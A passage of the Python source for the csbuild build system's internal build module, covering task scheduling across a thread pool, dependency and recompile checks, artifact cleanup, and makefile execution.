conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
package:: _build\n\t:synopsis: Logic related to actually running a build\n\"\"\"\n\n# Import this stuff to appease pylint\nfrom __future__ import unicode_literals, division, print_function\n\nimport shutil\n\nimport csbuild\nimport argparse\nimport os\nimport sys\nimport imp\nimport math\nimport multiprocessing\nimport time\nimport threading\nimport collections\n\nfrom . import recompile\nfrom . import project_plan, project, input_file\nfrom .. import log, commands, tools, perf_timer\nfrom .._utils import system, shared_globals, thread_pool, terminfo, ordered_set, FormatTime, queue, dag, MultiBreak, PlatformString, settings_manager\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass _dummy(object):\n\tdef __setattr__(self, key, value):\n\t\tpass\n\tdef __getattribute__(self, item):\n\t\treturn \"\"\n\n_runningBuilds = 0\n\ndef _canRun(tool):\n\treturn tool.maxParallel <= 0 or tool.curParallel < tool.maxParallel\n\ndef _enqueueBuild(buildProject, tool, buildInput, pool, projectList, projectsWithCrossProjectDeps, inputExtension, doCompileCheck=False):\n\twith perf_timer.PerfTimer(\"Enqueuing build tasks\"):\n\t\tglobal _runningBuilds\n\t\t_runningBuilds += 1\n\t\ttool.curParallel += 1\n\t\tshared_globals.totalBuilds += 1\n\t\tlog.UpdateProgressBar()\n\n\t\tbuildProject.toolchain.CreateReachability(tool)\n\n\t\tif tool.exclusive:\n\t\t\ttry:\n\t\t\t\tbuildProject.inputFiles[inputExtension].remove(buildInput)\n\t\t\texcept KeyError:\n\t\t\t\t#Wasn't in there so nothing to remove.\n\t\t\t\tpass\n\n\t\tif buildInput is None:\n\t\t\tbuildProject.toolchain.DeactivateTool(tool)\n\t\t\tlog.Info(\"Enqueuing null-input build for {} for project {}\", tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.Run, tool, buildProject.toolchain, buildProject, None, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, None, None)\n\t\t\t)\n\t\telif isinstance(buildInput, input_file.InputFile):\n\t\t\tbuildInput.AddUsedTool(tool)\n\t\t\tlog.Info(\"Enqueuing build for {} using {} for project {}\", buildInput, tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.Run, tool, buildProject.toolchain, buildProject, buildInput, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, inputExtension, [buildInput])\n\t\t\t)\n\t\telse:\n\t\t\tfor inputFile in buildInput:\n\t\t\t\tinputFile.AddUsedTool(tool)\n\n\t\t\tlog.Info(\"Enqueuing multi-build task for {} using {} for project {}\", buildInput, tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.RunGroup, tool, buildProject.toolchain, buildProject, buildInput, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, None, buildInput)\n\t\t\t)\n\ndef _dependenciesMet(buildProject, tool):\n\twith perf_timer.PerfTimer(\"Dependency checks\"):\n\t\tlog.Info(\"Checking if we can enqueue a new build for tool {} for project {}\", tool.__name__, buildProject)\n\t\tfor dependProject in buildProject.dependencies:\n\t\t\tfor dependency in tool.crossProjectDependencies:\n\t\t\t\tif dependProject.toolchain.IsOutputActive(dependency):\n\t\t\t\t\treturn False\n\n
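\t\t# Cross-project dependencies are clear; now check outputs still active within this project itself.\n\t\tfor dependency in 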
tool.dependencies:\n\t\t\tif buildProject.toolchain.IsOutputActive(dependency):\n\t\t\t\treturn False\n\t\treturn True\n\ndef _getGroupInputFiles(buildProject, tool):\n\twith perf_timer.PerfTimer(\"Collecting group inputs\"):\n\t\tfileList = ordered_set.OrderedSet()\n\t\tif tool.crossProjectInputGroups:\n\t\t\tfor inputFile in tool.crossProjectInputGroups:\n\t\t\t\tlog.Info(\"Checking if all cross-project builds for {} are done yet\", inputFile)\n\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\tlog.Info(\"Extension {} is still active, can't build yet.\", inputFile)\n\t\t\t\t\treturn None\n\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\tif dep.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\tlog.Info(\"Extension {} is still active in dependent project, can't build yet.\", inputFile)\n\t\t\t\t\t\treturn None\n\t\t\t\tlog.Info(\"{} is ok to build.\", inputFile)\n\t\t\t\tfileList.update([x for x in buildProject.inputFiles.get(inputFile, []) if not x.WasToolUsed(tool)])\n\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\tfileList.update(dep.inputFiles.get(inputFile, []))\n\t\telse:\n\t\t\tfor inputFile in tool.inputGroups:\n\t\t\t\tlog.Info(\"Checking if all builds for {} are done yet\", inputFile)\n\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\tlog.Info(\"Extension {} is still active, can't build yet.\", inputFile)\n\t\t\t\t\treturn None\n\t\t\t\tlog.Info(\"{} is ok to build.\", inputFile)\n\t\t\t\tfileList.update([x for x in buildProject.inputFiles.get(inputFile, []) if not x.WasToolUsed(tool)])\n\t\treturn fileList\n\ndef _checkDependenciesPreBuild(checkProject, tool, dependencies):\n\twith perf_timer.PerfTimer(\"Dependency checks\"):\n\t\tlog.Info(\"Checking if we can enqueue a new build for tool {} for project {}\", tool.__name__, checkProject)\n\t\tfor dependency in dependencies:\n\t\t\tfor checkTool in checkProject.toolchain.GetAllTools():\n\t\t\t\tif checkTool.inputFiles is None:\n\t\t\t\t\textensionSet = checkTool.inputGroups | checkTool.crossProjectInputGroups\n\t\t\t\telse:\n\t\t\t\t\textensionSet = checkTool.inputFiles | checkTool.inputGroups | checkTool.crossProjectInputGroups\n\t\t\t\thasExtension = False\n\t\t\t\tfor dependentExtension in extensionSet:\n\t\t\t\t\tif checkProject.inputFiles.get(dependentExtension):\n\t\t\t\t\t\thasExtension = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif hasExtension and checkProject.toolchain.CanCreateOutput(checkTool, dependency):\n\t\t\t\t\treturn False\n\t\treturn True\n\ndef _logThenRun(function, buildTool, buildToolchain, buildProject, inputFiles, doCompileCheck):\n\t\"\"\"\n\t:type buildProject: project.Project\n\t\"\"\"\n\tif inputFiles is not None:\n\t\tforceRebuild = False\n\t\tlog.Info(\"Checking whether to recompile {} for tool {} with cross-project dependencies {}\", inputFiles, buildTool.__name__, buildTool.crossProjectDependencies)\n\t\tfor dep in buildTool.crossProjectDependencies:\n\t\t\tlog.Info(\"Checking cross-project dependency '{}'\", dep)\n\t\t\tfor otherProj in buildProject.dependencies:\n\t\t\t\tlog.Info(\"Checking up-stream project {}, which has built files of type {} this run\", otherProj.name, otherProj.builtThisRun.keys())\n\t\t\t\tif dep in otherProj.builtThisRun:\n\t\t\t\t\tlog.Info(\"Found a cross-project recompile trigger, recompiling\")\n\t\t\t\t\tforceRebuild = True\n\t\t\t\t\tbreak\n\t\t\tif forceRebuild:\n\t\t\t\tbreak\n\t\tif not forceRebuild:\n\t\t\tif doCompileCheck:\n\t\t\t\twith perf_timer.PerfTimer(\"Recompile checks\"):\n
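\t\t\t\t\t# inputFiles may be a single file or a group; normalize to a list before asking the checker.\n\t\t\t\t\tif 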
isinstance(inputFiles, ordered_set.OrderedSet):\n\t\t\t\t\t\textension = os.path.splitext(list(inputFiles)[0].filename)[1]\n\t\t\t\t\t\tfileList = inputFiles\n\t\t\t\t\telse:\n\t\t\t\t\t\textension = os.path.splitext(inputFiles.filename)[1]\n\t\t\t\t\t\tfileList = ordered_set.OrderedSet([inputFiles])\n\n\t\t\t\t\tlastResult = buildProject.GetLastResult(inputFiles)\n\t\t\t\t\tif lastResult is not None \\\n\t\t\t\t\t\t\tand not recompile.ShouldRecompile(buildProject, buildProject.toolchain.GetChecker(extension), fileList):\n\t\t\t\t\t\tlog.Info(\"Previous result exists and input has not changed. Returning previous result.\")\n\t\t\t\t\t\treturn tuple(lastResult), True\n\t\t\telse:\n\t\t\t\tif isinstance(inputFiles, ordered_set.OrderedSet):\n\t\t\t\t\tfileList = inputFiles\n\t\t\t\telse:\n\t\t\t\t\tfileList = ordered_set.OrderedSet([inputFiles])\n\n\t\t\t\tlastResult = buildProject.GetLastResult(inputFiles)\n\t\t\t\tif lastResult is not None:\n\t\t\t\t\tfilesNeedingBuild = [f for f in fileList if not f.upToDate]\n\t\t\t\t\tif not filesNeedingBuild:\n\t\t\t\t\t\tlog.Info(\"Previous result exists and input has not changed. Returning previous result.\")\n\t\t\t\t\t\treturn tuple(lastResult), True\n\n\n\twith perf_timer.PerfTimer(\"Tool execution\"):\n\t\tlog.Info(\"Processing {} with {} for project {}\", \"null-input build\" if inputFiles is None else inputFiles, buildTool.__name__, buildProject)\n\n\t\twith buildToolchain.Use(buildTool):\n\t\t\treturn function(buildToolchain, buildProject, inputFiles), False\n\n@TypeChecked(\n\tpool=thread_pool.ThreadPool,\n\tprojectList=list,\n\tprojectsWithCrossProjectDeps=list,\n\tbuildProject=project.Project,\n\ttoolUsed=(_classType, _typeType),\n\tinputExtension=(String, type(None)),\n\tinputFiles=(list, ordered_set.OrderedSet, type(None)),\n\toutputFiles=(String, tuple),\n\tupToDate=bool\n)\ndef _buildFinished(pool, projectList, projectsWithCrossProjectDeps, buildProject, toolUsed, inputExtension, inputFiles, outputFiles, upToDate):\n\t\"\"\"\n\tBuild has finished, enqueue another one.\n\n\t:param pool: thread pool\n\t:type pool: thread_pool.ThreadPool\n\t:param projectList: list of all projects\n\t:type projectList: list[project.Project]\n\t:param projectsWithCrossProjectDeps: List of projects that contain cross-project dependencies\n\t:type projectsWithCrossProjectDeps: list[project.Project]\n\t:param buildProject: project\n\t:type buildProject: project.Project\n\t:param toolUsed: tool used to build it\n\t:type toolUsed: type\n\t:param inputExtension: Extension taken as input\n\t:type inputExtension: str, bytes\n\t:param inputFiles: inputs used for this build\n\t:type inputFiles: list[input_file.InputFile]\n\t:param outputFiles: output generated by the build\n\t:type outputFiles: tuple, str, bytes\n\t:param upToDate: Whether or not the file was already up to date. 
If so, no build was actually performed.\n\t:type upToDate: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Post-build processing\"):\n\t\ttoolUsed.curParallel -= 1\n\t\tglobal _runningBuilds\n\t\t_runningBuilds -= 1\n\t\tbuildProject.toolchain.ReleaseReachability(toolUsed)\n\n\t\twith perf_timer.PerfTimer(\"Checking for tool completion\"):\n\t\t\tif buildProject.toolchain.IsToolActive(toolUsed):\n\t\t\t\tdone = True\n\n\t\t\t\tremainingInputs = [x for x in buildProject.inputFiles.get(inputExtension, []) if not x.WasToolUsed(toolUsed)]\n\n\t\t\t\tif not remainingInputs:\n\t\t\t\t\t# Technically this will happen before the tool is finished building, so we need the\n\t\t\t\t\t# above guard to keep from doing it twice and tossing up exceptions.\n\t\t\t\t\t# The important thing here is that this will stop us from doing a lot of logic further\n\t\t\t\t\t# down to see if we can build for tools that we know we can't build for.\n\t\t\t\t\tif toolUsed.inputFiles is not None:\n\t\t\t\t\t\tfor inputFile in toolUsed.inputFiles:\n\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif done:\n\t\t\t\t\t\tfor inputFile in toolUsed.inputGroups:\n\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\tfor inputFile in toolUsed.crossProjectInputGroups:\n\t\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\t\t\t\t\t\tif dep.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tif not done:\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif done:\n\t\t\t\t\t\tlog.Info(\"Tool {} has finished building for project {}\", toolUsed.__name__, buildProject)\n\t\t\t\t\t\tbuildProject.toolchain.DeactivateTool(toolUsed)\n\n\t\tif not isinstance(outputFiles, tuple):\n\t\t\toutputFiles = (outputFiles, )\n\n\t\textensionsToCheck = set()\n\t\tfor outputFile in outputFiles:\n\t\t\tlog.Info(\n\t\t\t\t\"Checking for new tasks created by {}\",\n\t\t\t\tos.path.basename(outputFile)\n\t\t\t)\n\n\t\t\twith perf_timer.PerfTimer(\"Processing new inputs\"):\n\t\t\t\tbuildProject.AddArtifact(inputFiles, outputFile)\n\n\t\t\t\toutputExtension = os.path.splitext(outputFile)[1]\n\t\t\t\tif not upToDate:\n\t\t\t\t\tbuildProject.builtThisRun.setdefault(outputExtension, set()).add(outputFile)\n\t\t\t\textensionsToCheck.add(outputExtension)\n\n\t\t\t\tif inputExtension == outputExtension:\n\t\t\t\t\tnewInput = input_file.InputFile(outputFile, inputFiles, upToDate=upToDate)\n\t\t\t\telse:\n\t\t\t\t\tnewInput = input_file.InputFile(outputFile, upToDate=upToDate)\n\n\t\t\t\tbuildProject.inputFiles.setdefault(outputExtension, ordered_set.OrderedSet()).add(newInput)\n\n\t\t\t\t# Enqueue this file immediately in any tools that take it as a single input, unless they're marked to delay.\n\t\t\t\ttoolList = buildProject.toolchain.GetToolsFor(outputExtension, newInput.toolsUsed)\n\t\t\t\tfor tool in toolList:\n\t\t\t\t\tif not buildProject.toolchain.IsToolActive(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif not _dependenciesMet(buildProject, tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif newInput.WasToolUsed(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t_enqueueBuild(buildProject, tool, newInput, pool, 
projectList, projectsWithCrossProjectDeps, outputExtension)\n\n\t\tfor outputExtension in extensionsToCheck:\n\t\t\tisActive = buildProject.toolchain.IsOutputActive(outputExtension)\n\t\t\tlog.Info(\"Checking if {} is still active... {}\", outputExtension if outputExtension else \"<no extension>\", \"yes\" if isActive else \"no\")\n\n\t\t\t# If this was the last file being built of its extension, check whether we can pass it and maybe others to relevant group input tools\n\t\t\tif not isActive:\n\t\t\t\twith perf_timer.PerfTimer(\"Checking for newly enabled tools\"):\n\t\t\t\t\ttoolList = buildProject.toolchain.GetActiveTools()\n\t\t\t\t\tfor tool in toolList:\n\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif not _dependenciesMet(buildProject, tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif tool.inputFiles is None:\n\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, None, pool, projectList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor ext in tool.inputFiles:\n\t\t\t\t\t\t\t\twith perf_timer.PerfTimer(\"Enqueuing single-input builds\"):\n\t\t\t\t\t\t\t\t\tfor projectInput in [x for x in buildProject.inputFiles.get(ext, []) if not x.WasToolUsed(tool)]:\n\t\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, projectInput, pool, projectList, projectsWithCrossProjectDeps, ext)\n\n\t\t\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t# Check for group inputs that have been freed and queue up if all are free\n\t\t\t\t\t\tfileList = _getGroupInputFiles(buildProject, tool)\n\n\t\t\t\t\t\tif not fileList:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t_enqueueBuild(buildProject, tool, fileList, pool, projectList, projectsWithCrossProjectDeps, None)\n\n\t\t\t\t\t# Check to see if we've freed up any pending builds in other projects as well\n\t\t\t\t\twith perf_timer.PerfTimer(\"Cross-project dependency checks\"):\n\t\t\t\t\t\tfor proj in projectsWithCrossProjectDeps:\n\t\t\t\t\t\t\ttoolList = proj.toolchain.GetActiveTools()\n\t\t\t\t\t\t\tfor tool in toolList:\n\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\n\t\t\t\t\t\t\t\tif outputExtension not in tool.crossProjectDependencies and outputExtension not in tool.crossProjectInputGroups:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tif not _dependenciesMet(proj, tool):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tif tool.inputFiles is None:\n\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, None, pool, projectList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfor ext in tool.inputFiles:\n\t\t\t\t\t\t\t\t\t\twith perf_timer.PerfTimer(\"Enqueuing single-input builds\"):\n\t\t\t\t\t\t\t\t\t\t\tfor projectInput in [x for x in proj.inputFiles.get(ext, []) if not x.WasToolUsed(tool)]:\n\t\t\t\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, projectInput, pool, projectList, projectsWithCrossProjectDeps, ext)\n\n\t\t\t\t\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tfileList = _getGroupInputFiles(proj, tool)\n\n\t\t\t\t\t\t\t\tif not fileList:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, fileList, pool, projectList, 
projectsWithCrossProjectDeps, None)\n\n\t\tshared_globals.completedBuilds += 1\n\n\t\tif upToDate:\n\t\t\tlogFn = log.Info\n\t\telse:\n\t\t\tlogFn = log.Build\n\t\tmainFileDir = os.path.dirname(sys.modules[\"__main__\"].__file__)\n\t\tlogFn(\n\t\t\t\"Finished building {} => {}\",\n\t\t\t\"null-input for {} for project {}\".format(toolUsed.__name__, buildProject) if inputFiles is None else inputFiles,\n\t\t\t[os.path.relpath(PlatformString(outputFile), mainFileDir).replace(\"\\\\\", \"/\") for outputFile in outputFiles]\n\t\t\t\tif isinstance(outputFiles, tuple) else os.path.relpath(outputFiles, mainFileDir).replace(\"\\\\\", \"/\")\n\t\t)\n\t\tif shared_globals.verbosity > shared_globals.Verbosity.Verbose:\n\t\t\tlog.UpdateProgressBar()\n\n\t\tif _runningBuilds == 0:\n\t\t\t# We have no builds running and finishing this build did not spawn a new one\n\t\t\t# Time to exit.\n\t\t\tpool.Stop()\n\n\n@TypeChecked(numThreads=int, projectBuildList=list, _return=int)\ndef _build(numThreads, projectBuildList):\n\t\"\"\"\n\tRun a build.\n\n\t:param numThreads: Number of threads\n\t:type numThreads: int\n\t:param projectBuildList: List of projects\n\t:type projectBuildList: list[project.Project]\n\t:return: Number of failures\n\t:rtype: int\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Enqueuing initial builds\"):\n\t\tlog.Build(\"Starting builds\")\n\t\tbuildStart = time.time()\n\t\tglobal _runningBuilds\n\t\tcallbackQueue = queue.Queue()\n\t\tpool = thread_pool.ThreadPool(numThreads, callbackQueue)\n\t\tqueuedSomething = False\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor tool in buildProject.toolchain.GetAllTools():\n\t\t\t\ttool.curParallel = 0\n\n\t\tfailures = 0\n\t\tpool.Start()\n\n\t\tprojectsWithCrossProjectDeps = []\n\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor tool in buildProject.toolchain.GetAllTools():\n\t\t\t\tif tool.crossProjectDependencies or tool.crossProjectInputGroups:\n\t\t\t\t\tprojectsWithCrossProjectDeps.append(buildProject)\n\t\t\t\t\tbreak\n\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor extension, fileList in [(None, None)] + list(buildProject.inputFiles.items()):\n\t\t\t\tlog.Info(\"Enqueuing tasks for extension {}\", extension)\n\t\t\t\ttoolList = buildProject.toolchain.GetToolsFor(extension)\n\t\t\t\tfor tool in toolList:\n\t\t\t\t\ttry:\n\t\t\t\t\t\t# For the first pass, if ANY tool in the toolchain is capable of producing this output\n\t\t\t\t\t\t# anywhere in its path, AND any inputs exist for that tool, we won't queue up a build\n\t\t\t\t\t\tfor dependProject in buildProject.dependencies:\n\t\t\t\t\t\t\tif not _checkDependenciesPreBuild(dependProject, tool, tool.crossProjectDependencies):\n\t\t\t\t\t\t\t\traise MultiBreak\n\n\t\t\t\t\t\tif not _checkDependenciesPreBuild(buildProject, tool, tool.dependencies):\n\t\t\t\t\t\t\traise MultiBreak\n\n\t\t\t\t\texcept MultiBreak:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif fileList is None and extension is None:\n\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif not buildProject.toolchain.IsToolActive(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t_enqueueBuild(buildProject, tool, None, pool, projectBuildList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\tqueuedSomething = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.Info(\"Looking at files {}\", fileList)\n\t\t\t\t\t\tfor inputFile in list(fileList): #Make a list out of this so it doesn't get a modified-during-iteration error\n\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, 
inputFile, pool, projectBuildList, projectsWithCrossProjectDeps, extension, True)\n\t\t\t\t\t\t\tqueuedSomething = True\n\n\t\t\ttoolList = buildProject.toolchain.GetAllTools()\n\t\t\tlog.Info(\"Checking for group inputs we can run already\")\n\t\t\tfor tool in toolList:\n\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not _canRun(tool):\n\t\t\t\t\tcontinue\n\n\t\t\t\ttry:\n\t\t\t\t\tfor dependProject in buildProject.dependencies:\n\t\t\t\t\t\tif not _checkDependenciesPreBuild(dependProject, tool, tool.crossProjectDependencies):\n\t\t\t\t\t\t\traise MultiBreak()\n\n\t\t\t\t\tif not _checkDependenciesPreBuild(buildProject, tool, tool.dependencies):\n\t\t\t\t\t\traise MultiBreak()\n\n\t\t\t\texcept MultiBreak:\n\t\t\t\t\tcontinue\n\n\t\t\t\tfileList = _getGroupInputFiles(buildProject, tool)\n\n\t\t\t\tif not fileList:\n\t\t\t\t\tbreak\n\n\t\t\t\t_enqueueBuild(buildProject, tool, fileList, pool, projectBuildList, projectsWithCrossProjectDeps, None, True)\n\t\t\t\tqueuedSomething = True\n\n\tif not queuedSomething:\n\t\tlog.Build(\"Nothing to build.\")\n\t\tpool.Stop()\n\t\treturn 0\n\n\twith perf_timer.PerfTimer(\"Running builds\"):\n\t\twhile True:\n\t\t\twith perf_timer.PerfTimer(\"Main thread idle\"):\n\t\t\t\tcallback = callbackQueue.GetBlocking()\n\n\t\t\tif callback is thread_pool.ThreadPool.exitEvent:\n\t\t\t\tbreak\n\n\t\t\ttoReraise = None\n\t\t\ttry:\n\t\t\t\tcallback()\n\t\t\texcept thread_pool.ThreadedTaskException as e:\n\t\t\t\t_runningBuilds -= 1\n\t\t\t\tif _runningBuilds == 0:\n\t\t\t\t\t# We have no builds running and finishing this build did not spawn a new one\n\t\t\t\t\t# Time to exit.\n\t\t\t\t\tpool.Stop()\n\t\t\t\tfailures += 1\n\t\t\t\ttoReraise = e\n\t\t\texcept:\n\t\t\t\tpool.Abort()\n\t\t\t\traise\n\n\t\t\tif toReraise is not None:\n\t\t\t\ttry:\n\t\t\t\t\ttoReraise.Reraise()\n\t\t\t\texcept csbuild.BuildFailureException as buildExc:\n\t\t\t\t\tlog.Error(repr(buildExc))\n\t\t\t\texcept:\n\t\t\t\t\tpool.Abort()\n\t\t\t\t\traise\n\n\tfor buildProject in projectBuildList:\n\t\tif buildProject.toolchain.HasAnyReachability():\n\t\t\tlog.Error(\"Project {} did not finish building.\", buildProject)\n\t\t\tfailures += 1\n\n\tlog.Build(\"Build finished. 
Completed {} tasks in {}\", shared_globals.totalBuilds, FormatTime(time.time() - buildStart))\n\treturn failures\n\n@TypeChecked(projectCleanList=list, keepArtifactsAndDirectories=bool)\ndef _clean(projectCleanList, keepArtifactsAndDirectories):\n\t\"\"\"\n\tClean the files built in previous builds.\n\n\t:param projectCleanList: List of projects\n\t:type projectCleanList: list[project.Project]\n\t:param keepArtifactsAndDirectories: If true, clean will not close the artifacts file and will not delete directories\n\t:type keepArtifactsAndDirectories: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Cleaning build artifacts\"):\n\t\tlog.Build(\"Cleaning...\")\n\t\tdef _rmDirIfPossible(dirname):\n\t\t\twith perf_timer.PerfTimer(\"Removing directories (if possible)\"):\n\t\t\t\tif os.access(dirname, os.F_OK):\n\t\t\t\t\tcontainsOnlyDirs = True\n\t\t\t\t\tfor _, _, files in os.walk(dirname):\n\t\t\t\t\t\tif files:\n\t\t\t\t\t\t\tcontainsOnlyDirs = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif containsOnlyDirs:\n\t\t\t\t\t\tlog.Build(\"Removing {}\", dirname)\n\t\t\t\t\t\t#If it contains only directories and no files, remove everything\n\t\t\t\t\t\tshutil.rmtree(dirname)\n\t\t\t\t\t\t#Then if its parent directory is empty, remove it and any dirs above it that are also empty\n\t\t\t\t\t\tparentDir = os.path.dirname(dirname)\n\t\t\t\t\t\tif not os.listdir(parentDir):\n\t\t\t\t\t\t\tos.removedirs(parentDir)\n\n\t\tfor cleanProject in projectCleanList:\n\t\t\tlog.Info(\"Cleaning project {}\", cleanProject)\n\t\t\twith perf_timer.PerfTimer(\"Removing artifacts\"):\n\t\t\t\tfor artifacts in cleanProject.lastRunArtifacts.values():\n\t\t\t\t\tfor artifact in artifacts:\n\t\t\t\t\t\tif os.access(artifact, os.F_OK):\n\t\t\t\t\t\t\tlog.Info(\"Removing {}\", artifact)\n\t\t\t\t\t\t\tos.remove(artifact)\n\t\t\t\tcleanProject.lastRunArtifacts = collections.OrderedDict()\n\n\t\t\tif not keepArtifactsAndDirectories:\n\t\t\t\t_rmDirIfPossible(cleanProject.csbuildDir)\n\t\t\t\t_rmDirIfPossible(cleanProject.intermediateDir)\n\t\t\t\t_rmDirIfPossible(cleanProject.outputDir)\n\n\ndef _execfile(filename, glob, loc):\n\twith perf_timer.PerfTimer(\"Parsing Makefiles\"):\n\t\twith open(filename, \"r\") as f:\n\t\t\tglob[\"__file__\"] = filename\n\t\t\t# pylint: disable=exec-used\n\t\t\texec(compile(f.read(), filename, \"exec\"), glob, loc)\n\ndef _setupDefaultTargets():\n\tif csbuild.addDefaultTargets:\n\t\tfrom ..tools.common.tool_traits import HasOptimizationLevel\n\t\tOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\t\tfrom ..tools.common.tool_traits import HasDebugLevel\n\t\tDebugLevel = HasDebugLevel.DebugLevel\n\t\t#Create the default targets...\n\t\toldPlan = csbuild.currentPlan\n\t\tfor plan in project_plan.allPlans:\n\t\t\tlog.Info(\"Setting up default targets for {}\", plan)\n\t\t\tcsbuild.currentPlan = project_plan.allPlans[plan]\n\t\t\twith csbuild.Target(\"release\"):\n\t\t\t\tlog.Info(\"Setting up target 'release'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Max)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.Disabled)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(False)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug 
